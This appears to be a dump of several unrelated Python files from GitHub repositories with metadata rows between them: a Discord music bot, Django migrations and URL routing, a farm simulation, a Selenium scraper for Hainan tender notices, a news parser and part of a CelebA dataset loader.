    async def from_url(cls, url, *, loop=None, stream=False):
        """Resolve *url* with youtube-dl and return a playable source.

        When *stream* is True the media is streamed rather than downloaded
        to disk first.
        """
        import asyncio  # BUG FIX: asyncio was used below but never imported in this file
        loop = loop or asyncio.get_event_loop()
        # youtube-dl's extraction is blocking; run it off the event loop.
        data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
        if 'entries' in data:
            # Playlists resolve to a list of entries; take the first item.
            data = data['entries'][0]
        filename = data['url'] if stream else ytdl.prepare_filename(data)
        return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options), data=data)
client = commands.Bot(command_prefix='?')
status = ['Jamming out to music!', 'Eating!', 'Sleeping!']
@client.event
async def on_ready():
change_status.start()
print('Bot is online!')
@client.event
async def on_member_join(member):
channel = discord.utils.get(member.guild.channels, name='general')
await channel.send(f'Welcome {member.mention}! Ready to jam out? See `?help` command for details!')
@client.command(name='ping', help='This command returns the latency')
async def ping(ctx):
await ctx.send(f'**Pong!** Latency: {round(client.latency * 1000)}ms')
@client.command(name='hello', help='This command returns a random welcome message')
async def hello(ctx):
responses = ['***grumble*** Why did you wake me up?', 'Top of the morning to you lad!', 'Hello, how are you?', 'Hi', '**Wasssuup!**']
await ctx.send(choice(responses))
@client.command(name='die', help='This command returns a random last words')
async def die(ctx):
responses = ['why have you brought my short life to an end', 'i could have done so much more', 'i have a family, kill them instead']
await ctx.send(choice(responses))
@client.command(name='credits', help='This command returns the credits')
async def credits(ctx):
await ctx.send('Made by `RK Coding`')
await ctx.send('Thanks to `DiamondSlasher` for coming up with the idea')
await ctx.send('Thanks to `KingSticky` for helping with the `?die` and `?creditz` command')
@client.command(name='creditz', help='This command returns the TRUE credits')
async def creditz(ctx):
await ctx.send('**No one but me, lozer!**')
@client.command(name='play', help='This command plays music')
async def play(ctx, url):
if not ctx.message.author.voice:
await ctx.send("You are not connected to a voice channel")
return
else:
channel = ctx.message.author.voice.channel
await channel.connect()
server = ctx.message.guild
voice_channel = server.voice_client
async with ctx.typing():
player = await YTDLSource.from_url(url, loop=client.loop)
voice_channel.play(player, after=lambda e: print('Player error: %s' % e) if e else None)
await ctx.send('**Now playing:** {}'.format(player.title))
@client.command(name='stop', help='This command stops the music and makes the bot leave the voice channel')
async def stop(ctx):
voice_client = ctx.message.guild.voice_client
await voice_client.disconnect()
@tasks.loop(seconds=20)
async def change_status():
await client.change_presence(activity=discord.Game(choice(status)))
client.run('token')
| [
"noreply@github.com"
] | noreply@github.com |
f41c2cc05cab603afafc3e2f134cee4a96198d8c | eae037ea71a2dfb9830c2a8fd3b28fdf4e9048a3 | /code/chapter-1/create.py | b6e73c092e94ca0654c8d83d753bcbd4ab18fe98 | [
"MIT"
] | permissive | StevenYuysy/fullstack-in-python | 040c17ed93b8807fa5c4f0c5ebc34ef79678e0e9 | 688badd91d212298a49ec0d08c9cc456ccb16984 | refs/heads/master | 2021-01-20T20:36:54.835161 | 2016-07-31T15:07:12 | 2016-07-31T15:07:12 | 62,937,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
engine = create_engine('sqlite:///restaurantmenu.db')
# Bind the declarative metadata to the engine so sessions know the schema.
Base.metadata.bind = engine
DBSession = sessionmaker(bind = engine)
session = DBSession()
# Insert a single example restaurant row and persist it.
myFirstRestaurant = Restaurant(name='Pizza Hut')
session.add(myFirstRestaurant)
session.commit()
| [
"stevenyuysy@gmail.com"
] | stevenyuysy@gmail.com |
43d3b82f26767f992d2dca75556788abb438e7d5 | 7055607e2407e4adbad1bf888324e9b406f11092 | /FolderingFolderServer/migrations/0010_auto_20190524_1424.py | 899d0185f5108e273b3df2035b8a0154f6f199d7 | [] | no_license | wldnjszz1/foldering-backend | 3c3f6b933cb9fa6c41f467e4cf162377d40f846a | 2dd215c597cf4f55d36677cebeb035212e988c2b | refs/heads/master | 2020-05-05T06:56:54.850948 | 2019-05-25T03:36:24 | 2019-05-25T03:36:24 | 179,807,347 | 1 | 0 | null | 2019-04-06T08:24:45 | 2019-04-06T08:24:45 | null | UTF-8 | Python | false | false | 1,017 | py | # Generated by Django 2.2 on 2019-05-24 05:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the User model and repoint Folder's author FK to Folder.owner."""
    dependencies = [
        ('FolderingFolderServer', '0009_folder_author'),
    ]
    operations = [
        # New User model with an email and an optional avatar image.
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254)),
                ('userImage', models.ImageField(default='media/default_image.jpeg', null=True, upload_to='')),
            ],
        ),
        # Replace Folder.author with Folder.owner pointing at the new User model.
        migrations.RemoveField(
            model_name='folder',
            name='author',
        ),
        migrations.AddField(
            model_name='folder',
            name='owner',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='folders', to='FolderingFolderServer.User'),
        ),
    ]
| [
"wldnjszz1@naver.com"
] | wldnjszz1@naver.com |
14ecb79893f2a150fcc1e6200c9e85886e0f7225 | e282226e8fda085f4c64c044327eceb3388e94ce | /mainapp/api/urls.py | 1b3871642a15056f10650c9fb8bffcec8a5d906f | [] | no_license | Pavlenkovv/REST-API | 2bf36f40104a51f2735ce3dd3eebcf274061a1a2 | 352d0bd24e88fdb793e658c5b6eaffa97b56062c | refs/heads/main | 2023-03-15T22:45:50.121953 | 2021-03-07T07:56:31 | 2021-03-07T07:56:31 | 344,887,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .api_views import AuthorViewSet, NewsPostViewSet, CommentViewSet
router = DefaultRouter()
# NOTE(review): basename "user" for a NewsPost viewset looks copy-pasted - confirm.
router.register(r"newsposts", NewsPostViewSet, basename="user")
router.register(r"author", AuthorViewSet)
router.register(r"comment", CommentViewSet)
urlpatterns = [path("api/", include(router.urls))]
# NOTE(review): appending router.urls again exposes every route a second time at
# the URL root (in addition to the "api/" prefix) - confirm this is intentional.
urlpatterns += router.urls
| [
"pavlenko.vyacheslav@gmail.com"
] | pavlenko.vyacheslav@gmail.com |
a577db8343aacf6c938785370776165124e21ff3 | fc536757e799e4e63a618f54be00c814bf0f6c8d | /clip-search/pipeline/src/source.py | b4e8c1e81743e00d23dba502f2389927e8c9fcb0 | [
"MIT"
] | permissive | wellcomecollection/data-science | 94384593827bbeca3e6a6fb6cdd92a1f256ad256 | f5d158de6d4d652e7264093c64420288ecb6a85b | refs/heads/main | 2023-08-28T11:46:36.724074 | 2023-08-21T15:12:59 | 2023-08-21T15:12:59 | 217,507,441 | 7 | 1 | MIT | 2023-09-14T08:57:58 | 2019-10-25T10:11:57 | Jupyter Notebook | UTF-8 | Python | false | false | 1,132 | py | from .elasticsearch import get_catalogue_elastic_client
def yield_source_images(pipeline_date):
es = get_catalogue_elastic_client(pipeline_date)
index_name = f"images-indexed-{pipeline_date}"
pit = es.open_point_in_time(index=index_name, keep_alive="12h")
search_after = None
while True:
results = es.search(
body={
"size": 100,
"query": {"match_all": {}},
"_source": ["query.id", "display"],
"sort": [{"query.id": "asc"}],
"pit": {"id": pit["id"], "keep_alive": "1m"},
"search_after": search_after,
},
)
for hit in results["hits"]["hits"]:
yield hit["_source"]["display"]
if len(results["hits"]["hits"]) < 100:
break
search_after = [results["hits"]["hits"][-1]["_source"]["query"]["id"]]
es.close_point_in_time(id=pit["id"])
def count_source_images(pipeline_date):
es = get_catalogue_elastic_client(pipeline_date)
index_name = f"images-indexed-{pipeline_date}"
return es.count(index=index_name)["count"]
| [
"h.pim@wellcome.org"
] | h.pim@wellcome.org |
9d85ca9a49ac29137fab87fa3e5409a1f53439cf | a4cd26dc44067e0818e8e5e8bcab1598dac4cbc3 | /Thread_timer.py | 8d18fbe00d1dadb8b62183406c36ab59c8efff8d | [] | no_license | pacoSAM/CAM-GUI | c7f19d9094df94677021cd5440f68c94bfb32a32 | aba2baacc11446b5869f035148f27fd10937020f | refs/heads/master | 2021-01-20T20:48:08.361399 | 2016-08-23T11:32:59 | 2016-08-23T11:32:59 | 65,860,237 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | #! /usr/bin/python
#-*- coding: utf-8 -*-
#==========================================================
#Titre: timer
#
#
#Par: Paco SAMBA
#===========================================================
import threading ,time, datetime
verrou=threading.Lock()
class TimerDevice(threading.Thread):
def __init__(self,func, *args, **kwargs):
threading.Thread.__init__(self)
self.func=func
self.args=args
self.kwargs=kwargs
self.runable=True
def run(self):
while self.runable:
verrou.acquire()
self.func(*self.args, **self.kwargs)
verrou.release()
def stop(self):
self.runable=False
| [
"sambapaco@yahoo.fr"
] | sambapaco@yahoo.fr |
dd8efbcb0f30507324168b341eb1ef5685be3c38 | 19333274c884ecbdd1c2d11884de3cd9527b30b8 | /zl_spider/hainan/danzhou.py | c4e530d1a6268eec25ff5f431927f34bb7558b41 | [] | no_license | Gzigithub/- | 876efcb9400c2c3675a75c4530d9dfee9953ba5f | ec789bb31c85b1439901818c25dfbe0905963a79 | refs/heads/master | 2022-11-24T06:42:14.892696 | 2018-12-21T11:48:07 | 2018-12-21T11:48:07 | 126,142,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,499 | py | import time
import pandas as pd
import re
from lxml import etree
from selenium import webdriver
from bs4 import BeautifulSoup
from lmf.dbv2 import db_write
from selenium.webdriver import ActionChains, DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from lmfscrap import web
# __conp=["postgres","since2015","192.168.3.171","hunan","changsha"]
# url="https://ggzy.changsha.gov.cn/spweb/CS/TradeCenter/tradeList.do?Deal_Type=Deal_Type2"
# driver=webdriver.Chrome()
# driver.minimize_window()
# driver.get(url)
from zhulong import gg_meta, gg_html
def f1(driver, num):
    """Scrape page *num* of the announcement list.

    Returns a DataFrame with columns (title, publish date, link, info=None).
    """
    print(num)
    # Remember the first row's title so we can detect when the page has changed.
    locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a")
    val = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
    locator = (By.XPATH, "//div[@class='pagesite']/div")
    str = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
    # Current page number, e.g. "3/120" -> "3".  (NB: `str` shadows the builtin.)
    cnum = re.findall(r'(\d+)/', str)[0]
    # print(cnum)
    if num != int(cnum):
        # Navigate by URL rewrite: page 1 is index.jhtml, page N is index_N.jhtml.
        if num == 1:
            driver.execute_script("location.href=encodeURI('index.jhtml');")
        else:
            driver.execute_script("location.href=encodeURI('index_{}.jhtml');".format(num))
        # Wait until the first row's title differs from the previous page's.
        locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a[string()!='%s']" % val)
        WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator))
    page = driver.page_source
    soup = BeautifulSoup(page, 'lxml')
    table= soup.find("table", class_="newtable")
    tbody = table.find("tbody")
    trs = tbody.find_all("tr")
    data = []
    # The final <tr> is the pager row, so it is skipped.
    for tr in trs[:-1]:
        a = tr.find("a")
        try:
            link = a["href"]
        except:
            continue
        tds = tr.find_all("td")[2].text
        # Publish date is wrapped in square brackets, e.g. "[2018-12-01]".
        td = re.findall(r"\[(.*)\]", tds)[0]
        tmp = [a["title"].strip(), td.strip(), link.strip()]
        data.append(tmp)
    df = pd.DataFrame(data)
    df['info'] = None
    return df
def f2(driver):
    """Return the total number of list pages, then quit the driver."""
    # driver.set_page_load_timeout(30)
    # driver.maximize_window()
    # driver.execute_script("location.reload()")
    # html = driver.page_source
    # if html:
    #     pass
    # else:
    #     driver.refresh()
    locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a")
    WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator))
    locator = (By.XPATH, "//div[@class='pagesite']/div")
    str = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
    # Page count is the digits after the slash in e.g. "3/120".
    num = re.findall(r'/(\d+)', str)[0]
    driver.quit()
    return int(num)
def f3(driver, url):
    """Fetch an announcement detail page and return its content <div>."""
    driver.get(url)
    locator = (By.CLASS_NAME, "navBar")
    WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(locator))
    # Poll until the page source stops growing (dynamic content finished
    # loading), giving up after ~0.6 s.
    before = len(driver.page_source)
    time.sleep(0.1)
    after = len(driver.page_source)
    i = 0
    while before != after:
        before = len(driver.page_source)
        time.sleep(0.1)
        after = len(driver.page_source)
        i += 1
        if i > 5: break
    page = driver.page_source
    soup = BeautifulSoup(page, 'lxml')
    div = soup.find('div', class_="newsTex")
    return div
# Scrape targets: (output table name, list URL, output columns,
#                  page scraper f1, page counter f2) per announcement category.
data = [
    ["gcjs_zhaobiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs1/index.jhtml",
     ["name", "ggstart_time", "href", "info"], f1, f2],
    ["gcjs_zhongbiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs/index.jhtml",
     ["name", "ggstart_time", "href", "info"], f1, f2],
    ["zfcg_zhaobiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGZFZBGS/index.jhtml",
     ["name", "ggstart_time", "href", "info"], f1, f2],
    ["zfcg_zhongbiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGZFZBGS1/index.jhtml",
     ["name", "ggstart_time", "href", "info"], f1, f2],
]
def work(conp):
    """Run the full Danzhou scrape: list metadata first, then detail pages."""
    gg_meta(conp,data=data,diqu="海南省儋州市")
    gg_html(conp,f=f3)
if __name__ == '__main__':
    # Default Postgres connection parameters for a local run:
    # [user, password, host, database, schema].
    conp=["postgres","since2015","192.168.3.171","hainan","danzhou"]
    work(conp=conp)
#
# driver=webdriver.Chrome()
# url="http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs1/index.jhtml"
# driver.get(url)
# df = f2(driver)
# print(df)
# for i in range(1, 5):
#     df=f1(driver, i)
#     print(df)
| [
"123456.com"
] | 123456.com |
afd910c1dc1ff1f57ec13ad810946ddbdff546d7 | dc05171d98f1dc9f1193dbd7cfb145c17f54004e | /credittransfer/home/migrations/0004_auto_20200909_1755.py | 07fd301ca30d43bc2d2cd45bf0ba77029fef02ef | [] | no_license | adityanandan/credit_management-TSF | 363730746ecae6dd5e119a432ccacb1670631204 | dbb2a59ce6e8d21885c401fff88473b09233865d | refs/heads/master | 2022-12-19T13:31:41.366496 | 2020-09-17T15:14:01 | 2020-09-17T15:14:01 | 295,351,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | # Generated by Django 3.0.8 on 2020-09-09 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add bookkeeping fields previous_credit and user_id to the user model."""
    dependencies = [
        ('home', '0003_auto_20200909_1653'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='previous_credit',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='user',
            name='user_id',
            field=models.IntegerField(default=0),
        ),
    ]
| [
"agrahari.aditya16@gmail.com"
] | agrahari.aditya16@gmail.com |
6737cae69cbfad8f35c500dd8658e24cb6486688 | 097e6f529e9481de69415e89c1e5d653be0413a7 | /Field_Class.py | 0b3373c85244232f87111992a5a39a4d7773c797 | [] | no_license | Prudhvi-19/Farm-Management-System | 3057ec98b91f0ee479d14a72171a2521ceaa0efa | c8fb4a41a3a087e611457647fde5ba47bcb4df43 | refs/heads/master | 2020-04-22T12:23:08.483581 | 2019-02-12T18:36:10 | 2019-02-12T18:36:10 | 170,369,694 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,126 | py | from Cow_Class import *
from Sheep_Class import *
from Potato_Class import *
from Wheat_Class import *
import random
class Field:
    """A Class to simulate a Field which contains Plants and Animals."""
    #constructor: the capacity limits are fixed for the lifetime of the field
    def __init__(self, max_animals, max_crops):
        self._crops = []
        self._animals = []
        self._max_animals = max_animals
        self._max_crops = max_crops
    def plant_crop(self,crop):
        """Add *crop* if there is space; return True on success, else False."""
        if len(self._crops) < self._max_crops:
            self._crops.append(crop)
            return True
        else:
            return False
    def add_animal(self,animal):
        """Add *animal* if there is space; return True on success, else False."""
        if len(self._animals) < self._max_animals:
            self._animals.append(animal)
            return True
        else:
            return False
    def harvest_crop(self,position):
        """Remove and return the crop at list index *position*."""
        return self._crops.pop(position)
    def remove_animal(self,position):
        """Remove and return the animal at list index *position*."""
        return self._animals.pop(position)
    def report_contents(self):
        """Return {'Crops': [...], 'Animals': [...]} of report() values."""
        crop_report = []
        animal_report = []
        for crop in self._crops:
            crop_report.append(crop.report())
        for animal in self._animals:
            animal_report.append(animal.report())
        return {'Crops' : crop_report , 'Animals': animal_report}
    def report_need(self):
        """Summarise the field's needs: total Food, max Light and max Water."""
        food = 0
        light = 0
        water = 0
        # Crops share light and water, so only the largest single need matters.
        for crop in self._crops:
            needs = crop.needs()
            if needs['light_need'] > light:
                light = needs['light_need']
            if needs['water_need'] > water:
                water = needs['water_need']
        # Animals share water, but food is consumed so their needs are summed.
        for animal in self._animals:
            needs = animal.needs()
            food = food + needs['food need']
            if needs['water need'] > water:
                water = needs['water need']
        return {'Food' : food, 'Light' : light, 'Water': water}
    def grow(self,food,light,water):
        """Advance all crops and animals one day.

        Light and water are available in full to every occupant; *food* is a
        shared total that is divided among the animals, with any surplus handed
        out one extra unit per animal.
        """
        #grow the crop (Light and Water available to all the crops in same amount)
        if (len(self._crops)>0):
            for crop in self._crops:
                crop.grow(light,water)
        #grow the animals (water available to all the animals in same amount)
        #but food is total that must be shared
        if (len(self._animals)>0):
            #get total amount of food required in the Field
            food_required = 0
            for animal in self._animals:
                needs = animal.needs()
                food_required += needs['food need']
            #if we have more food available than is required work out the additional_food
            if food > food_required:
                additional_food = food - food_required
                food = food_required
            else:
                additional_food = 0
            #Grow each animal
            for animal in self._animals:
                #get the animals food needs
                needs = animal.needs()
                if food >= needs['food need']:
                    #remove food for this animal from total
                    food = food - needs['food need']
                    feed = needs['food need']
                    #see if there is additional_food left
                    if additional_food > 0:
                        #remove food from additional_food for this animal
                        additional_food -= 1
                        #add this to the feed given to animal
                        feed += 1
                    animal.grow(feed,water)
def auto_grow(field, days):
    """Grow *field* once per day for *days* days with random conditions."""
    for _ in range(days):
        # Draw the day's conditions (same order as the original RNG stream).
        daily_light = random.randint(1, 10)
        daily_water = random.randint(1, 10)
        daily_food = random.randint(1, 100)
        field.grow(daily_food, daily_light, daily_water)
def _prompt_value(prompt, lower, upper):
    """Prompt repeatedly until an integer in [lower, upper] is entered; return it."""
    while True:
        try:
            value = int(input(prompt))
            if lower <= value <= upper:
                return value
        except ValueError:
            pass
        print("Value entered not valid please enter value between {0}-{1}".format(lower, upper))


def manual_grow(field):
    """Ask the user for one day's food, water and light values and grow *field*.

    Bug fix: the original water prompt was not wrapped in a retry loop, so an
    invalid water entry left `water` unbound and field.grow() then raised
    NameError.  All three values now re-prompt until valid.
    """
    food = _prompt_value("Please enter food value(1-100): ", 1, 100)
    water = _prompt_value("Please enter water value(1-10): ", 1, 10)
    light = _prompt_value("Please enter light value(1-10): ", 1, 10)
    field.grow(food, light, water)
def display_crops(crop_list):
    """Print a numbered report line for every crop in *crop_list*."""
    print()
    print("The following are the crops in field: ")
    for index, crop in enumerate(crop_list, start=1):
        print("{0:>2}. {1}".format(index, crop.report()))
def display_animals(animal_list):
    """Print a numbered report line for every animal in *animal_list*."""
    print()
    # ("thr" typo kept verbatim - user-facing text is out of scope for a restyle)
    print("The following are thr animals in the field: ")
    for index, animal in enumerate(animal_list, start=1):
        print("{0:>2}. {1}".format(index, animal.report()))
def select_crop(length_list):
    """Prompt until the user picks a crop number in 1..length_list.

    Returns the selection as a 0-based list index.  Non-numeric input is now
    re-prompted (the original let int() raise ValueError and crash), matching
    the error handling already used in get_menu_choice().
    """
    valid = False
    while not valid:
        try:
            selected = int(input("Please select a crop: "))
            if selected in range(1, length_list + 1):
                valid = True
            else:
                print("Please select a valid option")
        except ValueError:
            print("Please select a valid option")
    return selected - 1
def select_animal(length_list):
    """Prompt until the user picks an animal number in 1..length_list.

    Returns the selection as a 0-based list index.  Non-numeric input is now
    re-prompted (the original let int() raise ValueError and crash), matching
    the error handling already used in get_menu_choice().
    """
    valid = False
    while not valid:
        try:
            selected = int(input("Please select a animal: "))
            if selected in range(1, length_list + 1):
                valid = True
            else:
                print("Please select a valid option")
        except ValueError:
            print("Please select a valid option")
    return selected - 1
def harvest_crop_from_field(field):
    """Show the crops, let the user pick one, and remove/return it."""
    display_crops(field._crops)
    selected_crop = select_crop(len(field._crops))
    return field.harvest_crop(selected_crop)
def remove_animal_from_field(field):
    """Show the animals, let the user pick one, and remove/return it."""
    display_animals(field._animals)
    selected_animal = select_animal(len(field._animals))
    return field.remove_animal(selected_animal)
def display_crop_menu():
    """Show the crop-planting submenu."""
    menu_lines = (
        "",
        "Which crop do you like to plant?: ",
        "1. Potato",
        "2. Wheat",
        "",
        "0. I dont want to plant crop return me to main menu",
        "",
        "Please select an action from Above menu",
    )
    for line in menu_lines:
        print(line)
def display_animal_menu():
    """Show the animal-buying submenu."""
    menu_lines = (
        "",
        "Which animal do you like to buy?: ",
        "1. Cow",
        "2. Sheep",
        "",
        "0. I dont want to buy animal return me to main menu",
        "",
        "Please select an action from Above menu",
    )
    for line in menu_lines:
        print(line)
def display_main_menu():
    """Show the top-level field-management menu (options 0-7)."""
    print()
    print("1. Plant a new crop")
    print("2. Harvest a crop")
    print()
    print("3. Buy a new animal")
    print("4.Slaughter a animal")
    print()
    print("5. Grow field manually over 1 day")
    print("6. Grow Field automatically over 30 days")
    print()
    print("7. Report Field Status")
    print()
    print("0. Exit Field")
    print()
    print("Please select an action from Above menu")
def get_menu_choice(lower, upper):
    """Prompt until the user enters an integer in [lower, upper]; return it.

    Bug fix: the original built the error message with "..." + lower + "-" +
    upper, concatenating ints into a str, so any out-of-range entry raised an
    uncaught TypeError.  The message is now produced with str.format().
    """
    valid = False
    while not valid:
        try:
            choice = int(input("Option selected: "))
            if lower <= choice <= upper:
                valid = True
            else:
                print("Please select a valid option {0}-{1}".format(lower, upper))
        except ValueError:
            print("Please select a valid option {0}-{1}".format(lower, upper))
    return choice
def plant_crop_in_field(field):
    """Ask which crop to plant and add it to *field*, reporting the outcome."""
    display_crop_menu()
    choice = get_menu_choice(0,2)
    # choice 0 falls through both branches: return without planting anything.
    if choice == 1:
        if field.plant_crop(Potato()):
            print()
            print ("Potato planted")
            print()
        else:
            print()
            print("No space in your field to plant potato")
            print()
    if choice == 2:
        if field.plant_crop(Wheat()):
            print()
            print ("Wheat planted")
            print()
        else:
            print()
            print("No space in your field to plant wheat")
            print()
def add_animal_to_field(field):
    """Ask which animal to buy, name it, and add it to *field*."""
    display_animal_menu()
    choice = get_menu_choice(0,2)
    # choice 0 falls through both branches: return without buying anything.
    if choice == 1:
        print()
        name=input(("What is the name of the cow: "))
        print()
        if field.add_animal(Cow(name)):
            print()
            print ("Cow added to herd")
            print()
        else:
            print()
            print("No space in your field to add cow")
            print()
    if choice == 2:
        print()
        name=input(("What is the name of the sheep: "))
        print()
        if field.add_animal(Sheep(name)):
            print()
            print ("Sheep added to herd")
            print()
        else:
            print()
            print("No space in your field to add sheep")
            print()
def manage_field(field):
    """Run the interactive menu loop for *field* until the user exits."""
    print ("Welcome to your field management Program")
    print()
    # NB: `exit` shadows the builtin inside this function.
    exit = False
    while not exit:
        display_main_menu()
        option = get_menu_choice(0,7)
        print()
        if option == 1:
            plant_crop_in_field(field)
        elif option == 2:
            removed_crop = harvest_crop_from_field(field)
            print("You harvested the crop: {0}".format(removed_crop))
        elif option == 3:
            add_animal_to_field(field)
        elif option == 4:
            removed_animal = remove_animal_from_field(field)
            print("You butchered the animal: {0}".format(removed_animal))
        elif option == 5:
            manual_grow(field)
        elif option == 6:
            auto_grow(field,30)
        elif option == 7:
            print(field.report_contents())
        elif option == 0:
            exit = True
    print()
    print ("Bye Bye ! See you again thanks for using field management program")
#Main Function of Field Class
def main():
    """Entry point: create a field (max 5 animals, 2 crops) and manage it."""
    new_field = Field(5,2)
    manage_field(new_field)
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | noreply@github.com |
daaaf0b5b3f4c3a36f1009e3b2b8a1cb64e00908 | af72519425d8a57afa86776a5a415aadaba8a1a0 | /clairvoyance/entity_types.py | 2c8670b4f66f4de2d82403d4541b1b30a897ae19 | [] | no_license | paulbricman/python-clairvoyance | 95d3daf47648973c9dea818137204affa9fdcd52 | 5c06dcd98107c1d37baf8157f029c0bbd35efe81 | refs/heads/master | 2021-09-13T10:45:49.126306 | 2018-04-28T15:40:58 | 2018-04-28T15:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | def string_type():
return ['string', '']
def lang_type():
return ['string', 'lang']
def name_type():
return ['string', 'name']
def domain_type():
return ['string', 'domain']
def ip_type():
return ['string', 'ip']
def country_type():
return ['string', 'country']
def integer_type():
return ['integer', '']
def float_type():
return ['float', '']
| [
"paubric@gmail.com"
] | paubric@gmail.com |
1b41395082d1617e92cb4539c977d7f616a594fc | ecd630f54fefa0a8a4937ac5c6724f9a3bb215c3 | /projeto/avalista/migrations/0022_auto_20200910_1230.py | 8922215b9bc4a928404f7c8043839ce3aebed4a8 | [] | no_license | israelwerther/Esctop_Israel_Estoque | 49968751464a38c473298ed876da7641efedf8de | d6ab3e502f2a97a0d3036351e59c2faa267c0efd | refs/heads/master | 2023-01-07T20:21:38.381593 | 2020-11-12T17:35:14 | 2020-11-12T17:35:14 | 258,642,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # Generated by Django 3.0.7 on 2020-09-10 12:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('avalista', '0021_avalista_fiador_n_operacao'),
]
operations = [
migrations.AlterField(
model_name='avalista',
name='fiador_agencia',
field=models.CharField(blank=True, max_length=15, null=True, verbose_name='Nº agência'),
),
migrations.AlterField(
model_name='avalista',
name='fiador_conta',
field=models.CharField(blank=True, max_length=15, null=True, verbose_name='Nº conta'),
),
]
| [
"israelwerther48@outlook.com"
] | israelwerther48@outlook.com |
0e228e608ad73772836b6b7c8696378c9b1eb319 | b444914008df603953c8c53d0eb833cf6e7f8dce | /deal_with_news/deal_with_news.py | bde6b832a0595aa5e9425d3c9844beb50ec6d708 | [] | no_license | changgedangxiao/craller_news | cceab2bf698c0f4658b49319b44288d574505e09 | dd1801b93eb7c38b0818921b94c3528761a60845 | refs/heads/master | 2022-12-17T07:27:06.154422 | 2019-01-29T11:14:23 | 2019-01-29T11:14:23 | 168,132,484 | 0 | 0 | null | 2022-12-08T01:34:19 | 2019-01-29T10:02:05 | HTML | UTF-8 | Python | false | false | 825 | py | #coding=utf-8
from bs4 import BeautifulSoup
import re
from craller_news.mysql_jh import DBConn
def deal_html(html_path="../fetch_html/1.html"):
    """Parse a saved news page and return (title, author, body text).

    Python 2 code (uses unicode()); expects Baijiahao-style markup.
    """
    soup=BeautifulSoup(open(html_path))
    news_title=soup.title.string
    news_author=soup.find(name="p",attrs={"class":"author-name"}).string
    # NOTE(review): find() with no arguments returns the first tag in the
    # document, and the result is never used - confirm what "source" should be.
    news_source=soup.find()
    news_list=soup.find_all(name="span",attrs={"class":["bjh-p","source"]})
    news_str=""
    for i in news_list:
        # NB: `str` shadows the builtin here.
        str=unicode(i.string).encode("utf-8")
        news_str+=str
    # Strip paragraphs whose content was None (concatenated as the text "None").
    news_content=re.sub(r"None","",news_str)
    return news_title,news_author,news_content
# Smoke-test the parser (Python 2 print statement), then open the DB helper.
for i in deal_html():
    print i
# SECURITY: database credentials are hard-coded here - move to config/env.
db_host = "127.0.0.1"
db_user = "root"
db_passwd = "Tianhu201"
db_name = "news"
db_conn = DBConn(db_host, db_user, db_passwd, db_name)
# NOTE(review): insert_data() is called with no arguments - the parsed news
# values above are never passed in; confirm against DBConn's implementation.
db_conn.insert_data()
| [
"hongli@starmerx.com"
] | hongli@starmerx.com |
13ca1c0d5bb3a665f885467aeb92cf786bba64b1 | c7e2e34b900029872b6760a38e905e9ebbdc31b6 | /lib/datasets/celeba.py | 4ed48778297b93519fdbad609949c052982a1e11 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | JiajianZeng/caffe-face-attributes | 333e56c3f43b64b600065aa6e5deb8e1a5c56ccb | c5c16d1eadea85fa40156de414fdbe595293aac2 | refs/heads/master | 2021-01-17T21:09:10.636678 | 2018-03-28T16:54:11 | 2018-03-28T16:54:11 | 84,162,833 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,243 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
from datasets.imdb import imdb
import datasets.ds_utils as ds_utils
import xml.etree.ElementTree as ET
import numpy as np
import scipy.sparse
import scipy.io as sio
import utils.cython_bbox
import cPickle
import subprocess
import uuid
from celeba_eval import voc_eval, roc_curve_single_attribute, dataset_eval
from fast_rcnn.config import cfg
class celeba(imdb):
def __init__(self, image_set, devkit_path=None):
imdb.__init__(self, 'celeba_' + image_set)
self._image_set = image_set
self._devkit_path = self._get_default_path() if devkit_path is None \
else devkit_path
